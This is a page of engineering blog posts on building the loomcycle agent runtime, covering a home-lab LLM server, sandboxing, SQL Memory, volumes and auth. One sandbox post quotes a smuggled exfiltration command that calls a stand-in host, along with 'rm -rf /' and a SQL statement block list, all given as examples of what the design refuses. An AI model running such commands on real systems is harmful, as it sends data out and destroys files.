Engineering writeups.
Benchmark findings, architecture decisions, and lessons learned from building loomcycle. We post when we have something useful to share - not on a schedule. Subscribe via RSS if you want to know when that happens.
-
Local LLMs on my TrueNAS, and the frontend I had to build.
Field log from upgrading my lab NAS (Intel N100, 16 GB DDR5, fine as storage and weak for everything else) into one box that hosts three workloads that landed at the same time: product-test VMs (JobEmber.ai plus a sibling SaaS in stealth pre-release), the loomcycle multi-replica server I test against, and local LLM inference. The constraint framed every other decision. No spare $4,500-5,500 for an NVIDIA DGX Spark; a Mac Studio with serious unified memory sits in the same band; Strix Halo (Ryzen AI MAX) starts around EUR 4,000 / $5,000 in Europe and everything is soldered, so you commit to a fixed RAM amount and a fixed iGPU at purchase. That reframe ruled out the Spark on price, Strix Halo on price AND rigidity, and a discrete-GPU build because the iGPU-plus-fast-system-RAM path is meaningfully cheaper for the model sizes I actually run and a discrete card means a bigger case, bigger PSU, and a second thermal envelope on a 24/7 box. The answer was upgrade the existing NAS: AM5 socket (chip is socketed, swappable), DIMM DDR5 (capacity and timing upgradeable without rebuilding), an APU as the inference engine, total parts cost ~EUR 2,100 (Ryzen 7 8700G + 96 GB DDR5-6000 CL30 + motherboard + new PSU, roughly half the entry price of the rejected options), and a clean upgrade path for the next-generation Ryzen APU when it ships (one chip and a BIOS flash, no motherboard, no RAM, no PSU, no case). With that locked, the rest is forced choices. Final build: AMD Ryzen 7 8700G with 96 GB of DDR5, doubling as the existing TrueNAS NAS. The hardware decision that shaped everything else: an APU is not the same as a desktop CPU with "integrated graphics." The 2-CU iGPUs on regular Ryzen and Intel chips are useless for inference; the 8700G's Radeon 780M (12 CUs, ~12.6 TFLOPS, plus an NPU) is the entry point. There is no 12-core or 16-core APU with a strong iGPU in AM5; AMD caps the good-iGPU line at the 8-core 8700G, so you can have many cores OR a capable iGPU, not both. The exotic tier is Strix Halo (Ryzen AI MAX, 40-CU Radeon 8060S, soldered LPDDR5X), more expensive and less flexible. Memory bandwidth, not core count, is the real lever. LLM inference is memory-bandwidth-bound, so more cores barely help past a point. DDR5-6000 CL30 with an AMD EXPO profile is the AM5 sweet spot; the 8700G's Phoenix controller tops out around 6000-6400 MT/s with two DIMMs, so a DDR5-8000 kit downclocks and wastes money. Buying trap: kit suffix encodes the profile (Corsair Z = EXPO, C = XMP; G.Skill "Neo" / "Flare X5" = EXPO, "Trident Z5 RGB" = XMP). Migration from the old TrueNAS: don't clone the boot drive, fresh-install plus config restore; ZFS data pools are portable via
zpool import; bigger-disk moves use ZFS replication (snapshot → send → receive); anything outside the GUI (cron jobs, hand-edited config) doesn't transfer; skip-version jumps can break app definitions even though pool data is safe. Getting the iGPU to do the work was the longest fight. gfx1103 is not officially supported by ROCm. Verify/dev/kfd+/dev/dri/renderD128are visible (no GPU passthrough = no acceleration). Force the override withHSA_OVERRIDE_GFX_VERSION=11.0.2+OLLAMA_IGPU_ENABLE=1. If you hitrocBLAS error: Cannot read TensileLibrary.dat for gfx1103, install prebuilt gfx1103 Tensile kernels (community builds pull these from Fedora's ROCm packages); after that Ollama reportslibrary=ROCm compute=gfx1103at 100% iGPU utilization. Real-workload throughput on this box:gemma4:latestat 13-15 tok/s;qwen3.6:latestat 9-12 tok/s; a smaller 3-4 GB model in the 24-48 tok/s band. The cross-model gap is the memory-bandwidth thesis playing out: qwen has more weight bytes per token to move than gemma does, and the gap is proportional to that, not to compute. The GTT-memory trick: BIOS may cap the iGPU's UMA frame buffer at 16 GB, but on Linux the iGPU dynamically allocates beyond that through GTT (Graphics Translation Table) memory up to about half system RAM by default, so on a 96 GB box the iGPU addresses tens of gigabytes regardless of the BIOS setting. Payoff: a 24 GB model running at 100% GPU on an integrated graphics core with a 128K context window. Tuning:OLLAMA_FLASH_ATTENTION=1cuts KV-cache memory 30-50%;OLLAMA_KV_CACHE_TYPE=q8_0roughly halves it again;num_gpu=99as a model option pushes layers onto the iGPU and spills the rest to CPU; some models default to a tiny 4K context regardless of capability, setnum_ctxexplicitly. Wrong-fit tools: vLLM is for datacenter GPUs (CUDA, or supported-ROCm cards); doesn't support the 780M and isn't a real CPU engine. Ollama doesn't generate images; diffusion needs a separate stack. The thermal surprise: CPU running 85-90°C while only 20-30% loaded looks alarming. The iGPU shares the same physical package as the CPU cores; one temperature sensor. Inference at "100% GPU" heats the package, shows up as "CPU temperature." Cap PPT (Package Power Tracking) at 65 W in BIOS (PBO Limits → Manual; units are milliwatts); since inference is memory-bound, capping power costs almost no speed. In my run this dropped a 90°C load to under 60°C, killing any need for a cooler upgrade or water cooling. And the frontend problem. I tried Open WebUI for two days and uninstalled it. The chat surface itself is good (clean thread, conversation list, the in-thread renderer, the keyboard shortcuts; I'd happily ship something with similar UX). The blockers sit underneath the chat: the configuration UI is weird (settings live in places I had to hunt for, two days in I still wasn't sure which of several places held the "default model for new chats" setting); providers and models have two unlinked configuration surfaces and one of them does nothing (after editing what I thought was the canonical surface, the models weren't showing up in the chat picker, the OTHER surface was the one that mattered, the first one is as far as I can tell vestigial); and Open WebUI can't reach the loomcycle tools and primitives I'd built workflows around (Documents as structured workspaces, Channels for cross-agent handoffs, Interruption + mid-run steering on every interactive session, per-principal MCP dispatch so the agent and I share the same per-scope SQLite file). The chat is good; the substrate underneath it is the wrong one for me. So I'm building the chat I wanted on top of the substrate I already use, following the chat-first sequencing in RFC AC as it stands today. The chat surface ships first: a standalone React + Vite SPA in a newloomboardrepo on the published@loomcycle/client, chat UX modelled on what Open WebUI gets right and the substrate hooks I missed. Each conversation is one loomcycle interactive session (RFC AI; first message starts it, follow-ups steer it, reopening re-attaches byrun_idor replays the transcript). The full tool loop renders inline (structured tool calls, structured tool results, model reasoning between them; not a flat bubble, an actual record). Live token / throughput / context-window metrics; context-compaction button when the window fills. Interruption answers in place. Per-conversation model overrides (provider / model / tier / thinking-depth) materialized as a uniquely-named derived AgentDef so the shared one is unaffected. Reuses existing wire only (interactive sessions, Interruption, compactRun, getTranscript, agentDef, listLibraryAgents, whoami; no new transports). The board lands next, same app: kanban over Document + Path, chunks as cards,statusas the column, typed fields driving chip rendering, state transitions through AgentTeam graphs (RFC AP); the launch publishing plan is the first dogfood loop. Chat is pre-alpha; the board has substrate plumbing but no UI yet. In parallel, the two loomcycle pieces I'm head-down on right now are tenant authorization (a real multi-tenant trust boundary across the wire surfaces) and loomcycle running as a TrueNAS-dockerized application so the same machine that hosts the inference hosts the runtime cleanly; both deserve their own writeup as the next blog topic. -
Agents and humans on the same chunks. How v1.5.0 made co-authoring the launch plan possible.
I'd been hand-editing a flat Markdown launch plan for three weeks. Every refactor cost 30 minutes of cut-and-paste. Two weekends ago I imported it as a chunked-graph Document (RFC AK, v1.4.0). 47 chunks; status as a typed field; SQL queries instead of grep. Then I hit a wall: the MCP plugin authenticated as
mcp-operatorwhile the Web UI logged me in as a different principal. SQL Memory uses per-scope file isolation, so my MCP-created Document landed inmcp-operator.dbwhile the Web UI read fromdenn.db. Two distinct SQLite files. The doc was provably created (queryable from MCP) and provably invisible (no entry in the Web UI tree). Human-and-agent co-authoring couldn't cross that gap. v1.5.0 closes it. RFC AG (per-principal/v1/_mcpdispatch): the MCP-server HTTP transport used to run every request as a global operator regardless of bearer, which is why the route wassubstrate:admin-only. v1.5.0 keys the dispatch off the authenticated principal viamcpPrincipalCtx, which stampsUserID = subject+TenantIDon every builtin-tool dispatch. User-scoped tools (document,memory,path) now key on the same id the off-run HTTP path uses. The route opens fromsubstrate:admintosubstrate:tenant; the per-tool gate inside the session still withholds admin-only meta-tools (token minting, runtime admin, snapshot capture/restore) by hiding them fromtools/listand refusing them ontools/call. Hook meta-tools promote to tenant-confinable.applyPrincipaloverrides wire-supplied tenant/user onspawn_run/spawn_runsso agent-spawned runs inherit the parent's identity.substrate:adminstill satisfies the route. RFC AO (declared principals): a new top-levelprincipals:block declares stable service identities —name → {tenant, subject, scopes, token_env}. The yaml carries only thetoken_envname; the bearer secret lives in.env.localvia that env var. The bearer resolver tries mintedOperatorTokenDef→ declared principal → legacyLOOMCYCLE_AUTH_TOKEN(constant-time match;token_envmay not name a loomcycle infra secret; a duplicate secret across two principals is a config-load error; an emptytoken_envat boot makes that principal inert with a startup warning). The payoff: one declared token authenticates BOTH the Web UI login at/ui/loginAND an MCP thin client viaLOOMCYCLE_MCP_UPSTREAM_TOKEN. Both resolve to the same(tenant, subject)by construction; the cross-transport file boundary disappears. RFC AN (config layering):--configis now repeatable; deep-merged left-to-right;LOOMCYCLE_CONFIG_FILEStakes the same list as a colon-separated env var for containers. One recursive rule: mapping ⊕ mapping merges keys, scalar/sequence replaces. Every replaced leaf is logged at startup;LOOMCYCLE_CONFIG_STRICT=1makes a cross-layer conflict fatal. Each file keeps its own${ENV}expansion; the merged whole runs the existingvalidate(). A single--configis byte-identical to before. Bundles (e.g. abundles/social-drafter/agent + skill + system prompt) now stack onto operator config without copy-paste. What it unlocks: the launch plan as a workflow. 18 publication chunks of typepublicationwith typed fields (platform,date,status,blog_slug,day_number,t_offset). Monday entries markedstatus: done; restscheduled. Drafts written viaupdate_chunkfrom MCP, status flipped todrafted, revision 1→2. Web UI saw the change live via the Channel topicdocuments/<id>/chunks. Optimistic concurrency catches same-chunk collisions; different chunks edit independently — no git merge on a single file. Status is queryable:SELECT * FROM chunks WHERE type='publication' AND status='scheduled' AND date <= '2026-06-30'returns an agent's next work item; the Web UI kanban view runs the same query. The natural agentic shape: human scaffolds → drafter agent picks upscheduledchunks → writes drafts → flips todrafted→ human reviews → posts → flips toposted→ reporter agent watches the channel and writes a weekly digest chunk. Three behaviors that the flat-Markdown plan couldn't support: optimistic concurrency on chunks, status as queryable data not prose, and per-chunk audit + Channel events. Additive — no breaking changes, no new wire RPCs. RFC AG is an auth/route change on an existing endpoint with the in-session per-tool gate preserving the admin-only boundary; RFC AO + AN are config-only. TS (@loomcycle/client) + Python (loomcycle) adapters are unchanged since v1.4.0 — no new adapter surface, so intentionally no@loomcycle/[email protected]and nopython-v1.5.0. The Claude Code plugin bumps to v1.5.0; admin-only commands flagged. Existing deployments without aprincipals:block keep working unchanged via the legacyLOOMCYCLE_AUTH_TOKENfallback. -
Path + Document: a Unix-like VFS and chunked-graph documents (v1.4.0).
Memory keys things by
(scope, key); Volumes byname; Channels by topic. The agent dialect was opaque ids — fine while an agent's job was "do work, write state, finish," wrong once humans had to look. The launch publishing plan ran for three weeks across the v1.0→v1.3.0 arc as a single linear Markdown file that I rewrote by hand every time a publication moved buckets. Two related gaps sat on the roadmap: agents and humans had no shared, human-readable namespace for the things the runtime stored (three resources, three naming worlds, nols); and "Document" was the obvious next primitive on top of Memory + SQL Memory — chunked-graph, first-class units with hierarchy + type + edges. v1.4.0 ships both: Path (RFC AL) and Document (RFC AK Phase 1). Path is the Linux inode/dirent split applied to substrate primitives. Resources keep permanent ids; adirentsrow in the runtime store maps(tenant, scope, scope_id, parent_path, name) → resource. One tree spans Memory entries, Volume mounts, and Documents. Six ops on the newPathtool:resolve·ls·stat·mkdir(v1 no-op; directories implicit S3-style) ·mv(atomic; cascades over a subtree in one transaction; refuses a move into its own subtree) ·rm(dirent-only by default;resource_too:truecascades;recursive:truerequired for non-empty paths, Linux semantics). Paths reject..at the boundary (the logical analog ofsandbox.go'srelInsideRoot); segments are[a-zA-Z0-9._-]+, max 64 segments / 1024 chars. A dirent is a name, not an authority grant — resolving/docs/launchto a Document id does not, by itself, let you read that Document; the resource's own scope/tenant check still applies. The risk Path introduces is integrity, not confidentiality. Resources opt in to a name:Memory.set { path: }registers amemory_entrydirent;VolumeDef.create { mount_at: }registers avolume_mount(default/vol/<name>; existing Volumes pick up implicit mounts lazily on first lookup, no migration);Document.create_document { path: }registers adocumentdirent. SQL Memory stays OUT of the tree (a per-scope database is not a named resource;SELECTdoesn't compose withls; likely never — the wrong abstraction). Document is a chunked-graph document with the content/structure split. Each chunk is a first-class unit with UUID + hierarchy position + optional supertag-liketype(publication/review-finding/architect-output) + structuredfields+ status + Markdown body +revisioninteger. Edges are first-class too (chunk_edgeswith kindpromotes/targets/implements; fast bidirectional lookup). Storage is split deliberately: chunk content (title, body, fields) lives in Memory keyed by the chunk UUID; chunk structure (parent / position / type / status / title / revision + edges + type schemas) lives in SQL Memory across four tables (documents,chunks,chunk_edges,chunk_types). Three reasons: different access patterns (content fetched whole and lazily; structure queried in bulk on every UI render); audit discipline (Memory captures content edits, SQL Memory captures structure edits); backup composition (Memory snapshot + SQL Memory snapshot together survive cross-instance restore, RFC X). 13 ops grouped: document lifecycle, chunk CRUD, edges, query, type defs. Three behaviors at the trust boundary: optimisticrevisionconcurrency onupdate_chunk(stale revision returns conflict; agent re-reads, re-applies, retries — Web UI uses the same dance); atomic deletes (whole cascade in one SQL Memory transaction; bidirectional edge cleanup so no dangling incoming cross-document edges;delete_chunkrefuses the root chunk); endpoint validation on edges + cycle guard onmove_chunk.query_chunksin three layers: structured filters (document_id+type+status+parent_id), Path-joined (under_path:"/docs/launches/"), and a validator-gated rawsql:escape hatch routed through the SQL Memory statement validator (RFC AA Phase 1's allowlist: noATTACH/VACUUM/PRAGMA/quoted-load_extension/multi-statement smuggling; writes refused from a read-only op). Document requires SQL Memory (LOOMCYCLE_SQLMEM_ENABLED=1); scope isagentoruserin v1.4.0 (tenant deferred until SQL Memory has tenant scope). Both primitives are on every transport. Beyond in-band agent use, Path and Document are first-class operations off-run:POST /v1/_path+POST /v1/_document(HTTP), thePath/DocumentgRPC RPCs (riding the existingSubstrateRequest/SubstrateResponseshape), the LoomCycle MCP meta-toolspath/document, andclient.path()/client.document()in@loomcycle/[email protected]and[email protected](Python). All four dispatch through one op-discriminatedConnectormethod per tool (the RFC AI cross-transport pattern). Scope and tenant are resolved server-side from the authenticated principal, never the wire — an off-run call withscope:"user"keys on the principal's subject, so an external UI authenticated asuser_id=alicereads and writes the sameuser-scoped namespace as agents running for the same user. No way for the wire to forge a scope_id. Both surfaces tenant-confined underScopeTenant(substrate:adminalso satisfies for cross-tenant administration). Bundle semantics for Documents in Path (borrowed from macOS.app): a Document at/docs/foo/v1.0lists as a directory inPathAND resolves as one resource; the Web UI will render it expandable. Additive at the runtime layer — no breaking changes. New HTTP endpoints, gRPC RPCs, MCP meta-tools; nothing consumed those surfaces before.direntsis a new migration on both backends. Deployments that don't use Path see zero behavior change (resources only get a dirent when they opt in). Adapters bump:@loomcycle/[email protected]+python-v1.4.0addclient.path()+client.document(); older code keeps working against the parts it already speaks. The core (internal/tools/builtin/pathtool.go,document.go) plus thedirentstable shipped onmainahead of this tag (PRs #538-#542); v1.4.0 is the first cut tag. -
Bashbox: in-process shell sandbox for agents. And what the bench told us about gbash speed (v1.3.0).
Every previous loomcycle release shipped with the same honest disclaimer on the
Bashtool: restricted, not isolated. The four knobs (cwd, scrubbed env, output bounds, wall-clock timeout) are real, but they don't change what the host kernel lets the loomcycle process do. v1.1.0 (Filesystem Volumes, RFC AH) made the asymmetry visible: Read / Write / Edit / Glob / Grep all started honoring per-agent read-only volume bindings;Bashdidn't, and rule #7 in the runtime CLAUDE.md said so explicitly: "Bash refuses read-only volumes rather than ship a guarantee a shell can't keep." A read-only mode onBashwould be a lie because a childshprocess cancdanywhere it has filesystem permission and the host kernel sees the agent's UID, not loomcycle's enforcement. v1.3.0 shipsBashbox(RFC AJ): a new opt-in shell tool backed by gbash (Apache-2.0, pure-Go) that runs scripts in-process. Noos/exec, no/bin/sh, no host process spawned at all. Path resolution stays inside the bound volume because there is no host kernel doing the resolving. The read-only mode is honestly enforceable because the write overlay is in RAM. Same input schema asBash(script string + optionalvolumearg). Same wire events. Adapters unchanged (TS and Python stay at 1.1.1). Opt-in twice:LOOMCYCLE_BASHBOX_ENABLED=1per deployment,allowed_tools: [Bashbox]per agent. Stateless per call (fresh interpreter every invocation; no shared env, nocdpersistence). Bundle: gbash's coreutils registry plus pure-Goawkandjqvia gbashcontrib. Unknown commands refuse by default (no shell-out, no host PATH leak). The read-only overlay (the load-bearing piece): arovolume mounts the host directory read-only as the base; writes during the call land in an in-memory write layer discarded when the call ends. A script cantouch /work/scratch.tmpand the file appears within the same call but the host tree never sees it. The host-command fallback (RFC AJ §13, operator-only escape hatch): two new env knobs let named commands fall through to the real host shell.LOOMCYCLE_BASHBOX_FALLBACK_COMMANDS=git,ghallowlists specific binaries; only those names escape (sogit status; curl evil.example.com/exfilrunsgiton the host and refusescurlin the sandbox, no smuggling).LOOMCYCLE_BASHBOX_FALLBACK_ALLOWED_ENV=GH_TOKEN,HOME,SSH_AUTH_SOCKinjects credentials into the host child only (the sandboxenvnever sees them, so the model can't read them viaenv). Fallback requires a read-write volume (a host process can't honor the in-RAM overlay). Loud boot warning when either knob is set. Off by default. The honest performance disclosure: gbash is pure-Go reimplementations of coreutils against decades-optimized native C. exp10 benches it on a representative coding-agent corpus (real git clone, file counts, grep, line totals, large-file scan, dir-depth probe). Result: 31% slower than/bin/shon total wall-clock, mixed per-op. Worst casecount_funcs(grep -cacross the tree) at +310%; one operation faster (total_loc, awc -laggregate, at -53%).git_cloneonly 15% slower because almost all the work is the realgitbinary via §13 fallback. One output mismatch:count_all_filesreturned 1274 vs 1193 because gbashfindaborts on a relative symlink and 81 files past it never reach the count. Three findings filed upstream to gbash, all open: #834find/EvalSymlinksaborts on relative symlinks (fix sits inresolveContainedSymlinkTarget: the containment check refuses the symlink before-type ffilters skip it); #835grep --include=GLOBmissing (only 21 options defined, no per-file glob filter inenumerateRecursive, exits with code 2 on the unknown option); #836xargs -P Nsilently falls back to serial (parsed and stored asmaxProcs, but the parallel implementation inxargs.go:884immediately delegates to the serial path with no warning; theinv.Execcallback shares session state that isn't goroutine-safe). Trust posture: Bashbox is the firstBash-shaped tool whose isolation claim matches the file tools.rm -rf /bounded to the in-RAM overlay;curldoesn't exist in the registry (no outbound network unless §13 fallback);cd ../../refused by the workspace boundary; credential files outside the volume don't exist in the gbash workspace. Two honest disclosures: gbash is alpha-tagged and the upstream threat model says explicitly "not a hardened sandbox" (loomcycle's outer trust boundary carries the security-critical guarantees; gbash carries the in-process shell semantics); command coverage measured ~97% identical-or-equivalent on a real loomcycle script corpus (the 3% gap drove the §13 fallback design). Why opt-in, why not auto-replaceBash: trusted-dev deployments stay on the existing tool (host shell, full PATH, peak throughput). Multi-tenant + untrusted-input + JobEmber.ai-shaped production deployments switch agents toBashbox. Both tools coexist; operators pick per agent. The 31% speed penalty matters for tight inner loops, matters less for single-shot scripts most agents actually run. What's next: upstream optimization (gbash dispatch, workspace stat path,findtraversal,grepregex cache haven't been profiled), upstream PRs on the contrib bundle when specific commands become load-bearing, gbash exits alpha. The opt-in posture is durable either way. Additive + off-by-default — no breaking changes, no new wire RPCs. A deployment that doesn't setLOOMCYCLE_BASHBOX_ENABLED=1sees zero behavior change. -
SQL Memory for agents. The third facet of the Memory primitive (v1.2.0).
Memory shipped at v0.8.0 as key-value with TTL and atomic increments. v0.9.0 added the vector facet (sqlite-vec, pgvector, provider-agnostic embedders). For a couple of weeks that was the shape: K/V for state, vectors for semantic search. It wasn't enough — the use case that kept surfacing in JobEmber.ai's production agents and every other real loomcycle deployment was the one neither facet covered: related tables with joins and aggregates. The workaround was
Bash + sqlite3— restricted-not-isolated. v1.2.0 ships RFC AA Phases 1 through 3g: SQL Memory. A third facet of the Memory primitive, two new ops on the same tool (sql_exec,sql_query) plus three for transactions (sql_begin,sql_commit,sql_rollback). Authorized agents run arbitrary SQL against a per-scope database the runtime hosts, isolated from the main loomcycle store. Two tiers: sqlite (file-per-scope under operator-blessed dir, statement-allowlist hardened — the defaultmodernc.org/sqlitedriver has no authorizer interface, so the primary defense is a Go-layer parsed-statement validator that refusesATTACH/DETACH/VACUUM/PRAGMA/quoted-load_extension/multi-statement smuggling, backed by per-scope file isolation) and postgres (schema-per-scope in a separate aux DB, per-scope least-privilegeLOGINrole withsearch_pathpinned to its own schema). Three scopes matching the rest of Memory: durableagent/user(persist across runs, tenant-keyed) plus ephemeralrun(one DB per spawn tree, dropped at run completion with fenced removal — mirrors RFC AH ephemeral volumes). Default-denysql_scopesACL per agent (RFC W pattern); havingMemoryinallowed_toolsisn't enough. Per-statement timeout, per-scope byte quota, row cap withtruncatedflag, full audit (statement text passes through the RFC Z redactor). Phase 3a explicit transactions:sql_begin/sql_commit/sql_rollbackopen runtime-managed transactions; the validator still refuses agent-issuedBEGIN. Cleanup is the load-bearing detail — explicit commit/rollback, run-end auto-rollback before the run-scope drop, TTL reaper (default 30s) for abandoned transactions. Phase 3b nested transactions via SAVEPOINT — a secondsql_beginnests instead of erroring; depth reported in every op result; LIFO, capped at 16. Phase 3c vector columns inside agents' own tables (postgres tier): semantic KNN and structured filters in one query — the thing K/V + main vector Memory can't do. Bind arg{"$embed": "<text>"}is replaced server-side by the embedding (multi-KB vectors never round-trip through the LLM); the operator installs pgvector once into a shared read-onlysqlmem_extschema; the agent declares its ownvector(N)column + HNSW index. Phase 3d + 3f.3 durable-scope GC: TTL sweeper (idle-targeting) + size-budget sweeper (bulk-targeting), both off-by-default + lossy-by-contract; in-use scopes never evicted;runscopes never counted. Phase 3e + 3f.2 snapshot integration: runtime JSON snapshot captures SQL Memory; every durable scope dumped logically (schema DDL + table data) into an optional tier-taggedsqlmemenvelope; restore replays through the normal provisioned path; idempotent; per-scope cap (sqlmem_snapshot_max_scope_bytes) so one runaway scope can't fail the whole capture. Phase 3g read-only shared schemas (postgres tier): operator-blessed reference data (lookup tables, taxonomies, config) loaded into a dedicated schema,GRANT SELECT ... TO PUBLIC, listed insqlmem_shared_schemas; runtime bakes it onto every scope role'ssearch_path; agentsSELECT/JOINit, can't write it (engine-enforced, role holds onlySELECT). The killer demo: exp9 — a Python sieve (primes.py) streams primes to stdout. A coding agent reads them via Bash stdio, creates a SQL memory table in user scope, batch-inserts every prime, then pings a channel. A validator agent on a different run waits on the channel, reads the primes from the same user-scoped SQL table, validates each one via inline trial-division through Bash, writes verdicts to a second table. Shared keyuser_id=exp9on both runs routes them to the same scope. Why a Memory facet, not a new tool: same scope vocabulary (K/V key + SQL table belong to the same logical container), same trust posture (per-scope isolation, default-deny ACL, audit, redactor). One tool, ten ops, one mental model. Additive + off-by-default — no breaking changes, no new wire RPCs. TS adapter + Python adapter unchanged at 1.1.1; SQL Memory rides on the existing Memory MCP surface.@loomcycle/[email protected]already works against v1.2.0. The structured-storage gap closes without spawningBash + sqlite3subprocesses. -
Interactive agentic sessions, now on every adapter (v1.1.1).
Yesterday's v1.1.0 shipped Filesystem Volumes - the workspace half of what the launch-week Paca conversation surfaced as missing for an external product to drive a loomcycle agent. Today's v1.1.1 ships RFC AI - the conversation half. A 3rd-party app can now start an interactive run, push operator messages into it mid-flight (steering), survive client disconnect under
context.WithoutCancel, and re-attach byrun_idfrom a fresh process or device. All through the official client surfaces that already handle non-interactive runs. The interactive terminal shipped over v0.26-v0.30 and has been load-bearing in the Web UI for five months: park atend_turnviaEventAwaitingInput, drain a steer queue at the top of each iteration (never mid-tool-call so atool_use/tool_resultpair is never split), cross-replica steer routing via theSteerCoordinatorbackplane, replay-from-?from_seq+ live-tail onGET /v1/runs/{id}/stream. That whole machine was reachable only through six raw HTTP calls inweb/src/api.ts. The official adapters (@loomcycle/client, Python gRPC) exposed a one-shot model with nointeractiveflag, no steering, no re-attach. gRPC had a deeper structural gap: thesteer.Registryand re-attach tail were owned by the HTTPServerstruct, not the transport-sharedConnectorgRPC dispatches through. v1.1.1 closes both gaps with three shared server changes + a thin per-transport surface. S1: self-sufficient re-attach -streamRunEventsrefactored to a visitor; the tail now replays the operator's ownuser_inputrows assteerframes withsource="replay"(was: skipped), so a cold client on a different device reconstructs the whole conversation, not just the agent's responses. The Web UI de-dupes against its optimistic echo. S2: Connector-lift -SteerRun+StreamRunEvents(+RunEventVisitor) added to theConnector(additive, mirrors the v0.33.0CompactRunlift). gRPC now reaches the same in-process steer registry an HTTP-started run registered in; cross-replica routing inherited free.handleRunInputdispatches throughSteerRuntoo, so both transports share one path. S3 + gRPC wire -RunInputandStreamRunRPCs,interactivefield onRunRequest,AwaitingInputandUserInputEvent payloads,eventToProtomaps the variants.sourceis server-stamped (never wire-trusted); tenant opaque-404 preserved; scope gatesRunInput→runs:create,StreamRun→runs:read. TypeScript adapter goes 57→61 methods + a high-levelInteractiveSessiondriver that ports the Web UI'suseRunStreamorchestration (start, events, send, cancel, detach, streamRunByID). Python adapter goes 40→42 RPCs (run_input+stream_run+interactive=True). Both adapters realign to 1.1.1 (the loomcycle line) so they actually publish together - tagging v1.1.1 publishes@loomcycle/[email protected](carrying the previously-skipped v0.35.0 Volume surface too) + a separatepython-v1.1.1tag publishes[email protected]. Reuse over reinvention: the parking, steering, cross-replica routing, and re-attach engines didn't change; only where they're reachable from did. Same shape RFC AH used forresolveInsideRoot, RFC L used for the host policy, RFC Z used for the contextplugin chain. The Paca-shaped integration story, two releases in: v1.1.0 = workspace isolation (per-ensemble Filesystem Volumes); v1.1.1 = conversation parity (interactive sessions on every adapter). Combined, an external product can now create an ephemeral workspace, clone a repo into it, start a loomcycle agent in interactive mode, drive the conversation through the official adapter, let the user disconnect or switch devices, re-attach byrun_idlater, and the ephemeral volume auto-purges when the run completes. Zero loomcycle-specific reverse engineering. The Paca integration itself remains on hold while the maintainer absorbs the multi-agent ensemble shape; the runtime side is no longer the blocker. -
Filesystem Volumes arrived. Multi-ensemble isolation in one runtime.
A week and a half ago the launch-week Paca conversation surfaced a real gap: every agent in a loomcycle instance shared one global filesystem jail (
LOOMCYCLE_READ_ROOT/WRITE_ROOT/BASH_CWD), so two ensembles in one runtime could read and write into each other's working tree with no operator control. The only fix was per-ensemble containers, which throws away the "one long-lived runtime hosting many agents cheaply" property the runtime exists to provide. Today's v1.1.0 closes that gap. RFC AH (Filesystem Volumes), Phases 1 through 5, shipped. A Volume is{name, path, mode: ro|rw}; an AgentDef binds to a named subset, file tools take an optionalvolumearg, ro/rw is enforced (Bash refuses ro rather than ship a guarantee a shell can't keep), and the load-bearing invariant is spawn confinement: a sub-agent's volume set ⊆ its parent's, with ro/rw resolving to the more restrictive. The same shape as the existingallowed_hostscaller-authoritative narrowing for network egress. The TOCTOU-saferesolveInsideRootdidn't change a byte; only which root is passed in changed. Phase 2a adds the dynamicVolumeDefsubstrate — tenant-scoped, runtime-mutable, with a runtime-derived path that never accepts a caller-supplied directory (the substrate derives<dynamic_root>/<tenant>/<name>; names match^[a-z0-9][a-z0-9_-]{0,63}$, no slashes/dots, no path injection). The op set iscreate/delete/purge, notretire/promote/fork(a Volume is a pointer to mutable on-disk content, not an immutable def). Phase 2b adds ephemeral run-scoped volumes:VolumeDef op=create ephemeral=trueprovisions<dynamic_root>/_ephemeral/<run_id>/<name>and auto-purges when the top-level run completes (terminally, in any state). Run-tree isolation: the ephemeral set is created fresh per top-level run, inherited by sub-agents (so a dispatcher and its 8 reviewers share one volume), but never crosses between top-level runs. Behind four fences for the purge (re-derive path, EvalSymlinks, assert-inside-root, prefix-check_ephemeral/<run>, refuse to delete the root); a singleton sweeper backstops crashed runs; paused runs skipped so a snapshot-and-resume keeps its working tree. Phase 3 BREAKING: the legacy jail env vars are removed. Volumes are now the sole filesystem mechanism. An agent not bound to any volume has no filesystem access (sandbox-by-default, mirroring "noallowed_hostsmeans no egress"). A deploy still setting the retired env vars fails at config-load with a migration hint. Migration is one-line: replace the three env vars withvolumes: { default: { path: /work/sandbox, mode: rw, default: true } }. Phase 4 ships a Volumes tab in the Web UI; Phase 5 closes cross-transport parity (HTTP, gRPC, MCP, TypeScript adapter, Python adapter all carry the same VolumeDef surface, identical wire shape and error codes). The killer demo: exp8 ships as a self-contained directory: a dispatcher agent creates an ephemeral volume,git clones loomcycle into it, fans out 8 reviewer agents viaAgent op=parallel_spawn(in-process barrier, no MCP round-trip), each writes findings to Memoryreview:<slice>:findings, a consolidator reads the ledger and writesreview-report.mdto the default volume, and the ephemeral volume auto-purges when the dispatcher exits. Contrasts with exp7 (external MCP fan-out, pre-cloned static ro volume, operator-driven barrier): use exp7 when the repo is large/shared or operators bring other MCP tools; use exp8 when you want zero-setup zero-cleanup on-demand code review with loomcycle owning the full lifecycle. Six PRs landed (#510 Phase 1, #511 Phase 2a, #512 Phase 2b, #513 Phase 3 breaking, #514 Phase 4 Web UI, #515 Phase 5 cross-transport).@loomcycle/[email protected]publishes to npm on the v1.1.0 tag; the Python adapter ([email protected]) ships on a separatepython-v0.9.0tag. The Paca conversation surfaced what loomcycle was missing; the substrate caught up. -
loomcycle 1.0 is here. Substrate complete. What's next.
Two months from a JobEmber.ai VPS that ran out of memory at 3-5 parallel
claude --printagents to a feature-complete agentic runtime. v1.0 ships today. The substrate is done: six LLM providers plus a deterministiccode-jsprovider, 19 built-in tools with Claude Code parity, MCP on both sides, A2A on both sides, multi-replica HA on Postgres LISTEN/NOTIFY (no Redis dep in v1.0), pause/snapshot/resume even mid-run and across instances (RFC X both phases), per-run credentials never reach the agent's view of its credentials map, aredactplugin in the run-loop that scrubs secrets before the model sees them, scheduled autonomous runs, signed inbound webhooks, content-addressed forkable AgentDefs with lineage. Production-grade validation: 8-hour stability soak (1.27M circuits, 3.8M agent runs, 100% completion across 468 waves, zero leaks) plus a 133-minute autonomous run on local Qwen3.6:27b throughollama-localafter the v0.34.3 → v0.37.0 robustness pass. Seven reproducible experiments in the repo (exp1 → exp7), each a self-contained directory. Paca integration confirmed: direct agreement with the Paca maintainer (Apache-2.0 AI-native Scrum / Trello / ClickUp alternative, 954 stars). The Paca maintainer is implementing the integration over gRPC - Paca's agent service calls loomcycle's gRPC surface directly to spawn runs, stream events, and route per-task agent credentials. The substrate primitives (Memory, Channel, Schedule,spawn_runsfan-out, per-run credentials, redact plugin) become available to Paca's UI through the same wire shape loomcycle uses for everything else. 